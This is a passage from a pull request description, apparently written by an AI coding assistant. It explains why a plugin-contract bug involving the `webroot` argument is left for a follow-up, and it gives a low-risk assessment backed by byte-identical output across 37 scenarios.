That is a live bug in the plugin contract rather than dead code, and fixing it changes what third-party plugins can do, so it is left out of a PR whose whole premise is that the emitted bytes do not move. Happy to do it as a follow-up if wanted. The same is true of writes to `webroot`: this PR makes the argument meaningful to read, but nothing downstream reads it back.

## Risk

Low. The four removals are proven byte-identical across 37 scenarios. The `webroot` change can only turn a `NULL` read into a real string — no shipped plugin reads that argument (`location` and `subnetgroup` are the only `BOOT_ITEM_NEW_SETTINGS` consumers, and neither touches it), and writes to it were inert before and remain inert.

---
_Generated by [Claude Code](https://claude.ai/code/session_01DmoFC2e9Cf3fa7mo3HLoN2)_